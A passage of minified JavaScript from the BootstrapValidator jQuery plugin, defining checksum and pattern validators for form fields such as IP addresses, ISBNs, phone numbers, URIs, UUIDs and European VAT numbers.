s=a.val();return""===s?!0:(r=t.extend({},{ipv4:!0,ipv6:!0},r),r.ipv4?{valid:/^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/.test(s),message:r.message||t.fn.bootstrapValidator.i18n.ip.ipv4}:r.ipv6?{valid:/^\s*((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:)))(%.+)?\s*$/.test(s),message:r.message||t.fn.bootstrapValidator.i18n.ip.ipv6}:!1)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.isbn=t.extend(t.fn.bootstrapValidator.i18n.isbn||{},{"default":"Please enter a valid ISBN number"}),t.fn.bootstrapValidator.validators.isbn={validate:function(t,e,a){var r=e.val();if(""===r)return!0;var s;switch(!0){case/^\d{9}[\dX]$/.test(r):case 13===r.length&&/^(\d+)-(\d+)-(\d+)-([\dX])$/.test(r):case 13===r.length&&/^(\d+)\s(\d+)\s(\d+)\s([\dX])$/.test(r):s="ISBN10";break;case/^(978|979)\d{9}[\dX]$/.test(r):case 17===r.length&&/^(978|979)-(\d+)-(\d+)-(\d+)-([\dX])$/.test(r):case 17===r.length&&/^(978|979)\s(\d+)\s(\d+)\s(\d+)\s([\dX])$/.test(r):s="ISBN13";break;default:return!1}r=r.replace(/[^0-9X]/gi,"");var i,n,o=r.split(""),l=o.length,d=0;switch(s){case"ISBN10":for(d=0,i=0;l-1>i;i++)d+=parseInt(o[i],10)*(10-i);return n=11-d%11,11===n?n=0:10===n&&(n="X"),n+""===o[l-1];case"ISBN13":for(d=0,i=0;l-1>i;i++)d+=i%2===0?parseInt(o[i],10):3*parseInt(o[i],10);return n=10-d%10,10===n&&(n="0"),n+""===o[l-1];default:return!1}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.isin=t.extend(t.fn.bootstrapValidator.i18n.isin||{},{"default":"Please enter a valid ISIN number"}),t.fn.bootstrapValidator.validators.isin={COUNTRY_CODES:"AF|AX|AL|DZ|AS|AD|AO|AI|AQ|AG|AR|AM|AW|AU|AT|AZ|BS|BH|BD|BB|BY|BE|BZ|BJ|BM|BT|BO|BQ|BA|BW|BV|BR|IO|BN|BG|BF|BI|KH|CM|CA|CV|KY|CF|TD|CL|CN|CX|CC|CO|KM|CG|CD|CK|CR|CI|HR|CU|CW|CY|CZ|DK|DJ|DM|DO|EC|EG|SV|GQ|ER|EE|ET|FK|FO|FJ|FI|FR|GF|PF|TF|GA|GM|GE|DE|GH|GI|GR|GL|GD|GP|GU|GT|GG|GN|GW|GY|HT|HM|VA|HN|HK|HU|IS|IN|ID|IR|IQ|IE|IM|IL|IT|JM|JP|JE|JO|KZ|KE|KI|KP|KR|KW|KG|LA|LV|LB|LS|LR|LY|LI|LT|LU|MO|MK|MG|MW|MY|MV|ML|MT|MH|MQ|MR|MU|YT|MX|FM|MD|MC|MN|ME|MS|MA|MZ|MM|NA|NR|NP|NL|NC|NZ|NI|NE|NG|NU|NF|MP|NO|OM|PK|PW|PS|PA|PG|PY|PE|PH|PN|PL|PT|PR|QA|RE|RO|RU|RW|BL|SH|KN|LC|MF|PM|VC|WS|SM|ST|SA|SN|RS|SC|SL|SG|SX|SK|SI|SB|SO|ZA|GS|SS|ES|LK|SD|SR|SJ|SZ|SE|CH|SY|TW|TJ|TZ|TH|TL|TG|TK|TO|TT|TN|TR|TM|TC|TV|UG|UA|AE|GB|US|UM|UY|UZ|VU|VE|VN|VG|VI|WF|EH|YE|ZM|ZW",validate:function(t,e,a){var r=e.val();if(""===r)return!0;r=r.toUpperCase();var s=new RegExp("^("+this.COUNTRY_CODES+")[0-9A-Z]{10}$");if(!s.test(r))return!1;for(var i="",n=r.length,o=0;n-1>o;o++){var l=r.charCodeAt(o);i+=l>57?(l-55).toString():r.charAt(o)}var d="",u=i.length,f=u%2!==0?0:1;for(o=0;u>o;o++)d+=parseInt(i[o],10)*(o%2===f?2:1)+"";var p=0;for(o=0;o<d.length;o++)p+=parseInt(d.charAt(o),10);return p=(10-p%10)%10,p+""===r.charAt(n-1)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.ismn=t.extend(t.fn.bootstrapValidator.i18n.ismn||{},{"default":"Please enter a valid ISMN number"}),t.fn.bootstrapValidator.validators.ismn={validate:function(t,e,a){var r=e.val();if(""===r)return!0;var s;switch(!0){case/^M\d{9}$/.test(r):case/^M-\d{4}-\d{4}-\d{1}$/.test(r):case/^M\s\d{4}\s\d{4}\s\d{1}$/.test(r):s="ISMN10";break;case/^9790\d{9}$/.test(r):case/^979-0-\d{4}-\d{4}-\d{1}$/.test(r):case/^979\s0\s\d{4}\s\d{4}\s\d{1}$/.test(r):s="ISMN13";break;default:return!1}"ISMN10"===s&&(r="9790"+r.substr(1)),r=r.replace(/[^0-9]/gi,"");for(var i=r.length,n=0,o=[1,3],l=0;i-1>l;l++)n+=parseInt(r.charAt(l),10)*o[l%2];return n=10-n%10,n+""===r.charAt(i-1)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.issn=t.extend(t.fn.bootstrapValidator.i18n.issn||{},{"default":"Please enter a valid ISSN number"}),t.fn.bootstrapValidator.validators.issn={validate:function(t,e,a){var r=e.val();if(""===r)return!0;if(!/^\d{4}\-\d{3}[\dX]$/.test(r))return!1;r=r.replace(/[^0-9X]/gi,"");var s=r.split(""),i=s.length,n=0;"X"===s[7]&&(s[7]=10);for(var o=0;i>o;o++)n+=parseInt(s[o],10)*(8-o);return n%11===0}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.lessThan=t.extend(t.fn.bootstrapValidator.i18n.lessThan||{},{"default":"Please enter a value less than or equal to %s",notInclusive:"Please enter a value less than %s"}),t.fn.bootstrapValidator.validators.lessThan={html5Attributes:{message:"message",value:"value",inclusive:"inclusive"},enableByHtml5:function(t){var e=t.attr("max");return e?{value:e}:!1},validate:function(e,a,r){var s=a.val();if(""===s)return!0;var i=t.isNumeric(r.value)?r.value:e.getDynamicOption(a,r.value);return s=parseFloat(s),r.inclusive===!0||void 0===r.inclusive?{valid:i>=s,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.lessThan["default"],i)}:{valid:i>s,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.lessThan.notInclusive,i)}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.mac=t.extend(t.fn.bootstrapValidator.i18n.mac||{},{"default":"Please enter a valid MAC address"}),t.fn.bootstrapValidator.validators.mac={validate:function(t,e,a){var r=e.val();return""===r?!0:/^([0-9A-F]{2}[:-]){5}([0-9A-F]{2})$/.test(r)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.notEmpty=t.extend(t.fn.bootstrapValidator.i18n.notEmpty||{},{"default":"Please enter a value"}),t.fn.bootstrapValidator.validators.notEmpty={enableByHtml5:function(t){var e=t.attr("required")+"";return"required"===e||"true"===e},validate:function(e,a,r){var s=a.attr("type");return"radio"===s||"checkbox"===s?e.getFieldElements(a.attr("data-bv-field")).filter(":checked").length>0:""!==t.trim(a.val())}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.numeric=t.extend(t.fn.bootstrapValidator.i18n.numeric||{},{"default":"Please enter a valid float number"}),t.fn.bootstrapValidator.validators.numeric={html5Attributes:{message:"message",separator:"separator"},enableByHtml5:function(t){return"number"===t.attr("type")&&void 0!==t.attr("step")&&t.attr("step")%1!==0},validate:function(t,e,a){var r=e.val();if(""===r)return!0;var s=a.separator||".";return"."!==s&&(r=r.replace(s,".")),!isNaN(parseFloat(r))&&isFinite(r)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.phone=t.extend(t.fn.bootstrapValidator.i18n.phone||{},{"default":"Please enter a valid phone number",countryNotSupported:"The country code %s is not supported",country:"Please enter a valid phone number in %s",countries:{GB:"United Kingdom",US:"USA"}}),t.fn.bootstrapValidator.validators.phone={html5Attributes:{message:"message",country:"country"},COUNTRY_CODES:["GB","US"],validate:function(e,a,r){var s=a.val();if(""===s)return!0;var i=r.country;if(("string"!=typeof i||-1===t.inArray(i,this.COUNTRY_CODES))&&(i=e.getDynamicOption(a,i)),!i||-1===t.inArray(i.toUpperCase(),this.COUNTRY_CODES))return{valid:!1,message:t.fn.bootstrapValidator.helpers.format(t.fn.bootstrapValidator.i18n.phone.countryNotSupported,i)};var n=!0;switch(i.toUpperCase()){case"GB":s=t.trim(s),n=/^\(?(?:(?:0(?:0|11)\)?[\s-]?\(?|\+)44\)?[\s-]?\(?(?:0\)?[\s-]?\(?)?|0)(?:\d{2}\)?[\s-]?\d{4}[\s-]?\d{4}|\d{3}\)?[\s-]?\d{3}[\s-]?\d{3,4}|\d{4}\)?[\s-]?(?:\d{5}|\d{3}[\s-]?\d{3})|\d{5}\)?[\s-]?\d{4,5}|8(?:00[\s-]?11[\s-]?11|45[\s-]?46[\s-]?4\d))(?:(?:[\s-]?(?:x|ext\.?\s?|\#)\d+)?)$/.test(s);break;case"US":default:s=s.replace(/\D/g,""),n=/^(?:(1\-?)|(\+1 ?))?\(?(\d{3})[\)\-\.]?(\d{3})[\-\.]?(\d{4})$/.test(s)&&10===s.length}return{valid:n,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.phone.country,t.fn.bootstrapValidator.i18n.phone.countries[i])}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.regexp=t.extend(t.fn.bootstrapValidator.i18n.regexp||{},{"default":"Please enter a value matching the pattern"}),t.fn.bootstrapValidator.validators.regexp={html5Attributes:{message:"message",regexp:"regexp"},enableByHtml5:function(t){var e=t.attr("pattern");return e?{regexp:e}:!1},validate:function(t,e,a){var r=e.val();if(""===r)return!0;var s="string"==typeof a.regexp?new RegExp(a.regexp):a.regexp;return s.test(r)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.remote=t.extend(t.fn.bootstrapValidator.i18n.remote||{},{"default":"Please enter a valid value"}),t.fn.bootstrapValidator.validators.remote={html5Attributes:{message:"message",url:"url",name:"name"},validate:function(e,a,r){var s=a.val();if(""===s)return!0;var i=a.attr("data-bv-field"),n=r.data||{},o=r.url,l=r.type||"POST";"function"==typeof n&&(n=n.call(this,e)),"function"==typeof o&&(o=o.call(this,e)),n[r.name||i]=s;var d=new t.Deferred,u=t.ajax({type:l,url:o,dataType:"json",data:n});return u.then(function(t){d.resolve(a,"remote",t.valid===!0||"true"===t.valid,t.message?t.message:null)}),d.fail(function(){u.abort()}),d}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.rtn=t.extend(t.fn.bootstrapValidator.i18n.rtn||{},{"default":"Please enter a valid RTN number"}),t.fn.bootstrapValidator.validators.rtn={validate:function(t,e,a){var r=e.val();if(""===r)return!0;if(!/^\d{9}$/.test(r))return!1;for(var s=0,i=0;i<r.length;i+=3)s+=3*parseInt(r.charAt(i),10)+7*parseInt(r.charAt(i+1),10)+parseInt(r.charAt(i+2),10);return 0!==s&&s%10===0}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.sedol=t.extend(t.fn.bootstrapValidator.i18n.sedol||{},{"default":"Please enter a valid SEDOL number"}),t.fn.bootstrapValidator.validators.sedol={validate:function(t,e,a){var r=e.val();if(""===r)return!0;if(r=r.toUpperCase(),!/^[0-9A-Z]{7}$/.test(r))return!1;for(var s=0,i=[1,3,1,7,3,9,1],n=r.length,o=0;n-1>o;o++)s+=i[o]*parseInt(r.charAt(o),36);return s=(10-s%10)%10,s+""===r.charAt(n-1)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.siren=t.extend(t.fn.bootstrapValidator.i18n.siren||{},{"default":"Please enter a valid SIREN number"}),t.fn.bootstrapValidator.validators.siren={validate:function(e,a,r){var s=a.val();return""===s?!0:/^\d{9}$/.test(s)?t.fn.bootstrapValidator.helpers.luhn(s):!1}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.siret=t.extend(t.fn.bootstrapValidator.i18n.siret||{},{"default":"Please enter a valid SIRET number"}),t.fn.bootstrapValidator.validators.siret={validate:function(t,e,a){var r=e.val();if(""===r)return!0;for(var s,i=0,n=r.length,o=0;n>o;o++)s=parseInt(r.charAt(o),10),o%2===0&&(s=2*s,s>9&&(s-=9)),i+=s;return i%10===0}}}(window.jQuery), function(t){t.fn.bootstrapValidator.i18n.step=t.extend(t.fn.bootstrapValidator.i18n.step||{},{"default":"Please enter a valid step of %s"}),t.fn.bootstrapValidator.validators.step={html5Attributes:{message:"message",base:"baseValue",step:"step"},validate:function(e,a,r){var s=a.val();if(""===s)return!0;if(r=t.extend({},{baseValue:0,step:1},r),s=parseFloat(s),!t.isNumeric(s))return!1;var i=function(t,e){var a=Math.pow(10,e);t*=a;var r=t>0|-(0>t),s=t%1===.5*r;return s?(Math.floor(t)+(r>0))/a:Math.round(t)/a},n=function(t,e){if(0===e)return 1;var a=(t+"").split("."),r=(e+"").split("."),s=(1===a.length?0:a[1].length)+(1===r.length?0:r[1].length);return i(t-e*Math.floor(t/e),s)},o=n(s-r.baseValue,r.step);return{valid:0===o||o===r.step,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.step["default"],[r.step])}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.stringCase=t.extend(t.fn.bootstrapValidator.i18n.stringCase||{},{"default":"Please enter only lowercase characters",upper:"Please enter only uppercase characters"}),t.fn.bootstrapValidator.validators.stringCase={html5Attributes:{message:"message","case":"case"},validate:function(e,a,r){var s=a.val();if(""===s)return!0;var i=(r["case"]||"lower").toLowerCase();return{valid:"upper"===i?s===s.toUpperCase():s===s.toLowerCase(),message:r.message||("upper"===i?t.fn.bootstrapValidator.i18n.stringCase.upper:t.fn.bootstrapValidator.i18n.stringCase["default"])}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.stringLength=t.extend(t.fn.bootstrapValidator.i18n.stringLength||{},{"default":"Please enter a value with valid length",less:"Please enter less than %s characters",more:"Please enter more than %s characters",between:"Please enter value between %s and %s characters long"}),t.fn.bootstrapValidator.validators.stringLength={html5Attributes:{message:"message",min:"min",max:"max"},enableByHtml5:function(t){var e=t.attr("maxlength");return e?{max:parseInt(e,10)}:!1},validate:function(e,a,r){var s=a.val();if(""===s)return!0;var i=t.isNumeric(r.min)?r.min:e.getDynamicOption(a,r.min),n=t.isNumeric(r.max)?r.max:e.getDynamicOption(a,r.max),o=s.length,l=!0,d=r.message||t.fn.bootstrapValidator.i18n.stringLength["default"];switch((i&&o<parseInt(i,10)||n&&o>parseInt(n,10))&&(l=!1),!0){case!!i&&!!n:d=t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.stringLength.between,[parseInt(i,10),parseInt(n,10)]);break;case!!i:d=t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.stringLength.more,parseInt(i,10));break;case!!n:d=t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.stringLength.less,parseInt(n,10))}return{valid:l,message:d}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.uri=t.extend(t.fn.bootstrapValidator.i18n.uri||{},{"default":"Please enter a valid URI"}),t.fn.bootstrapValidator.validators.uri={html5Attributes:{message:"message",allowlocal:"allowLocal"},enableByHtml5:function(t){return"url"===t.attr("type")},validate:function(t,e,a){var r=e.val();if(""===r)return!0;var s=a.allowLocal===!0||"true"===a.allowLocal,i=new RegExp("^(?:(?:https?|ftp)://)(?:\\S+(?::\\S*)?@)?(?:"+(s?"":"(?!(?:10|127)(?:\\.\\d{1,3}){3})(?!(?:169\\.254|192\\.168)(?:\\.\\d{1,3}){2})(?!172\\.(?:1[6-9]|2\\d|3[0-1])(?:\\.\\d{1,3}){2})")+"(?:[1-9]\\d?|1\\d\\d|2[01]\\d|22[0-3])(?:\\.(?:1?\\d{1,2}|2[0-4]\\d|25[0-5])){2}(?:\\.(?:[1-9]\\d?|1\\d\\d|2[0-4]\\d|25[0-4]))|(?:(?:[a-z\\u00a1-\\uffff0-9]+-?)*[a-z\\u00a1-\\uffff0-9]+)(?:\\.(?:[a-z\\u00a1-\\uffff0-9]+-?)*[a-z\\u00a1-\\uffff0-9]+)*(?:\\.(?:[a-z\\u00a1-\\uffff]{2,})))(?::\\d{2,5})?(?:/[^\\s]*)?$","i");return i.test(r)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.uuid=t.extend(t.fn.bootstrapValidator.i18n.uuid||{},{"default":"Please enter a valid UUID number",version:"Please enter a valid UUID version %s number"}),t.fn.bootstrapValidator.validators.uuid={html5Attributes:{message:"message",version:"version"},validate:function(e,a,r){var s=a.val();if(""===s)return!0;var i={3:/^[0-9A-F]{8}-[0-9A-F]{4}-3[0-9A-F]{3}-[0-9A-F]{4}-[0-9A-F]{12}$/i,4:/^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i,5:/^[0-9A-F]{8}-[0-9A-F]{4}-5[0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i,all:/^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}$/i},n=r.version?r.version+"":"all";return{valid:null===i[n]?!0:i[n].test(s),message:r.version?t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.uuid.version,r.version):r.message||t.fn.bootstrapValidator.i18n.uuid["default"]}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.vat=t.extend(t.fn.bootstrapValidator.i18n.vat||{},{"default":"Please enter a valid VAT number",countryNotSupported:"The country code %s is not supported",country:"Please enter a valid %s VAT number",countries:{AT:"Austrian",BE:"Belgian",BG:"Bulgarian",CH:"Swiss",CY:"Cypriot",CZ:"Czech",DE:"German",DK:"Danish",EE:"Estonian",ES:"Spanish",FI:"Finnish",FR:"French",GB:"United Kingdom",GR:"Greek",EL:"Greek",HU:"Hungarian",HR:"Croatian",IE:"Irish",IT:"Italian",LT:"Lithuanian",LU:"Luxembourg",LV:"Latvian",MT:"Maltese",NL:"Dutch",NO:"Norwegian",PL:"Polish",PT:"Portuguese",RO:"Romanian",RU:"Russian",RS:"Serbian",SE:"Swedish",SI:"Slovenian",SK:"Slovak"}}),t.fn.bootstrapValidator.validators.vat={html5Attributes:{message:"message",country:"country"},COUNTRY_CODES:["AT","BE","BG","HR","CY","CZ","DK","EE","FI","FR","DE","GR","EL","HU","IE","IT","LV","LT","LU","MT","NL","NO","PL","PT","RO","RU","RS","SK","SI","ES","SE","CH","GB"],validate:function(e,a,r){var s=a.val();if(""===s)return!0;var i=r.country;if(i?("string"!=typeof i||-1===t.inArray(i.toUpperCase(),this.COUNTRY_CODES))&&(i=e.getDynamicOption(a,i)):i=s.substr(0,2),-1===t.inArray(i,this.COUNTRY_CODES))return{valid:!1,message:t.fn.bootstrapValidator.helpers.format(t.fn.bootstrapValidator.i18n.vat.countryNotSupported,i)};var n=["_",i.toLowerCase()].join("");return this[n](s)?!0:{valid:!1,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.vat.country,t.fn.bootstrapValidator.i18n.vat.countries[i.toUpperCase()])}},_at:function(t){if(!/^ATU[0-9]{8}$/.test(t))return!1;t=t.substr(3);for(var e=0,a=[1,2,1,2,1,2,1],r=0,s=0;7>s;s++)r=parseInt(t.charAt(s),10)*a[s],r>9&&(r=Math.floor(r/10)+r%10),e+=r;return e=10-(e+4)%10,10===e&&(e=0),e+""===t.substr(7,1)},_be:function(t){if(!/^BE[0]{0,1}[0-9]{9}$/.test(t))return!1;if(t=t.substr(2),9===t.length&&(t="0"+t),"0"===t.substr(1,1))return!1;var e=parseInt(t.substr(0,8),10)+parseInt(t.substr(8,2),10);return e%97===0},_bg:function(e){if(!/^BG[0-9]{9,10}$/.test(e))return!1;e=e.substr(2);var a=0,r=0;if(9===e.length){for(r=0;8>r;r++)a+=parseInt(e.charAt(r),10)*(r+1);if(a%=11,10===a)for(a=0,r=0;8>r;r++)a+=parseInt(e.charAt(r),10)*(r+3);return a%=10,a+""===e.substr(8)}if(10===e.length){var s=function(e){var a=parseInt(e.substr(0,2),10)+1900,r=parseInt(e.substr(2,2),10),s=parseInt(e.substr(4,2),10);if(r>40?(a+=100,r-=40):r>20&&(a-=100,r-=20),!t.fn.bootstrapValidator.helpers.date(a,r,s))return!1;for(var i=0,n=[2,4,8,5,10,9,7,3,6],o=0;9>o;o++)i+=parseInt(e.charAt(o),10)*n[o];return i=i%11%10,i+""===e.substr(9,1)},i=function(t){for(var e=0,a=[21,19,17,13,11,9,7,3,1],r=0;9>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e%=10,e+""===t.substr(9,1)},n=function(t){for(var e=0,a=[4,3,2,7,6,5,4,3,2],r=0;9>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e=11-e%11,10===e?!1:(11===e&&(e=0),e+""===t.substr(9,1))};return s(e)||i(e)||n(e)}return!1},_ch:function(t){if(!/^CHE[0-9]{9}(MWST)?$/.test(t))return!1;t=t.substr(3);for(var e=0,a=[5,4,3,2,7,6,5,4],r=0;8>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e=11-e%11,10===e?!1:(11===e&&(e=0),e+""===t.substr(8,1))},_cy:function(t){if(!/^CY[0-5|9]{1}[0-9]{7}[A-Z]{1}$/.test(t))return!1;if(t=t.substr(2),"12"===t.substr(0,2))return!1;for(var e=0,a={0:1,1:0,2:5,3:7,4:9,5:13,6:15,7:17,8:19,9:21},r=0;8>r;r++){var s=parseInt(t.charAt(r),10);r%2===0&&(s=a[s+""]),e+=s}return e="ABCDEFGHIJKLMNOPQRSTUVWXYZ"[e%26],e+""===t.substr(8,1)},_cz:function(e){if(!/^CZ[0-9]{8,10}$/.test(e))return!1;e=e.substr(2);var a=0,r=0;if(8===e.length){if(e.charAt(0)+""=="9")return!1;for(a=0,r=0;7>r;r++)a+=parseInt(e.charAt(r),10)*(8-r);return a=11-a%11,10===a&&(a=0),11===a&&(a=1),a+""===e.substr(7,1)}if(9===e.length&&e.charAt(0)+""=="6"){for(a=0,r=0;7>r;r++)a+=parseInt(e.charAt(r+1),10)*(8-r);return a=11-a%11,10===a&&(a=0),11===a&&(a=1),a=[8,7,6,5,4,3,2,1,0,9,10][a-1],a+""===e.substr(8,1)}if(9===e.length||10===e.length){var s=1900+parseInt(e.substr(0,2),10),i=parseInt(e.substr(2,2),10)%50%20,n=parseInt(e.substr(4,2),10);if(9===e.length){if(s>=1980&&(s-=100),s>1953)return!1}else 1954>s&&(s+=100);if(!t.fn.bootstrapValidator.helpers.date(s,i,n))return!1;if(10===e.length){var o=parseInt(e.substr(0,9),10)%11;return 1985>s&&(o%=10),o+""===e.substr(9,1)}return!0}return!1},_de:function(e){return/^DE[0-9]{9}$/.test(e)?(e=e.substr(2),t.fn.bootstrapValidator.helpers.mod11And10(e)):!1},_dk:function(t){if(!/^DK[0-9]{8}$/.test(t))return!1;t=t.substr(2);for(var e=0,a=[2,7,6,5,4,3,2,1],r=0;8>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e%11===0},_ee:function(t){if(!/^EE[0-9]{9}$/.test(t))return!1;t=t.substr(2);for(var e=0,a=[3,7,1,3,7,1,3,7,1],r=0;9>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e%10===0},_es:function(t){if(!/^ES[0-9A-Z][0-9]{7}[0-9A-Z]$/.test(t))return!1;t=t.substr(2);var e=function(t){var e=parseInt(t.substr(0,8),10);return e="TRWAGMYFPDXBNJZSQVHLCKE"[e%23],e+""===t.substr(8,1)},a=function(t){var e=["XYZ".indexOf(t.charAt(0)),t.substr(1)].join("");return e=parseInt(e,10),e="TRWAGMYFPDXBNJZSQVHLCKE"[e%23],e+""===t.substr(8,1)},r=function(t){var e,a=t.charAt(0);if(-1!=="KLM".indexOf(a))return e=parseInt(t.substr(1,8),10),e="TRWAGMYFPDXBNJZSQVHLCKE"[e%23],e+""===t.substr(8,1);if(-1!=="ABCDEFGHJNPQRSUVW".indexOf(a)){for(var r=0,s=[2,1,2,1,2,1,2],i=0,n=0;7>n;n++)i=parseInt(t.charAt(n+1),10)*s[n],i>9&&(i=Math.floor(i/10)+i%10),r+=i;return r=10-r%10,r+""===t.substr(8,1)||"JABCDEFGHI"[r]===t.substr(8,1)}return!1},s=t.charAt(0);return/^[0-9]$/.test(s)?e(t):/^[XYZ]$/.test(s)?a(t):r(t)},_fi:function(t){if(!/^FI[0-9]{8}$/.test(t))return!1;t=t.substr(2);for(var e=0,a=[7,9,10,5,8,4,2,1],r=0;8>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e%11===0},_fr:function(e){if(!/^FR[0-9A-Z]{2}[0-9]{9}$/.test(e))return!1;if(e=e.substr(2),!t.fn.bootstrapValidator.helpers.luhn(e.substr(2)))return!1;if(/^[0-9]{2}$/.test(e.substr(0,2)))return e.substr(0,2)===parseInt(e.substr(2)+"12",10)%97+"";var a,r="0123456789ABCDEFGHJKLMNPQRSTUVWXYZ";return a=/^[0-9]{1}$/.test(e.charAt(0))?24*r.indexOf(e.charAt(0))+r.indexOf(e.charAt(1))-10:34*r.indexOf(e.charAt(0))+r.indexOf(e.charAt(1))-100,(parseInt(e.substr(2),10)+1+Math.floor(a/11))%11===a%11},_gb:function(t){if(!(/^GB[0-9]{9}$/.test(t)||/^GB[0-9]{12}$/.test(t)||/^GBGD[0-9]{3}$/.test(t)||/^GBHA[0-9]{3}$/.test(t)||/^GB(GD|HA)8888[0-9]{5}$/.test(t)))return!1;t=t.substr(2);var e=t.length;if(5===e){var a=t.substr(0,2),r=parseInt(t.substr(2),10);return"GD"===a&&500>r||"HA"===a&&r>=500}if(11===e&&("GD8888"===t.substr(0,6)||"HA8888"===t.substr(0,6)))return"GD"===t.substr(0,2)&&parseInt(t.substr(6,3),10)>=500||"HA"===t.substr(0,2)&&parseInt(t.substr(6,3),10)<500?!1:parseInt(t.substr(6,3),10)%97===parseInt(t.substr(9,2),10);if(9===e||12===e){for(var s=0,i=[8,7,6,5,4,3,2,10,1],n=0;9>n;n++)s+=parseInt(t.charAt(n),10)*i[n];return s%=97,parseInt(t.substr(0,3),10)>=100?0===s||42===s||55===s:0===s}return!0},_gr:function(t){if(!/^GR[0-9]{9}$/.test(t))return!1;t=t.substr(2),8===t.length&&(t="0"+t);for(var e=0,a=[256,128,64,32,16,8,4,2],r=0;8>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e=e%11%10,e+""===t.substr(8,1)},_el:function(t){return/^EL[0-9]{9}$/.test(t)?(t="GR"+t.substr(2),this._gr(t)):!1},_hu:function(t){if(!/^HU[0-9]{8}$/.test(t))return!1;t=t.substr(2);for(var e=0,a=[9,7,3,1,9,7,3,1],r=0;8>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e%10===0},_hr:function(e){return/^HR[0-9]{11}$/.test(e)?(e=e.substr(2),t.fn.bootstrapValidator.helpers.mod11And10(e)):!1},_ie:function(t){if(!/^IE[0-9]{1}[0-9A-Z\*\+]{1}[0-9]{5}[A-Z]{1,2}$/.test(t))return!1;t=t.substr(2);var e=function(t){for(;t.length<7;)t="0"+t;for(var e="WABCDEFGHIJKLMNOPQRSTUV",a=0,r=0;7>r;r++)a+=parseInt(t.charAt(r),10)*(8-r);return 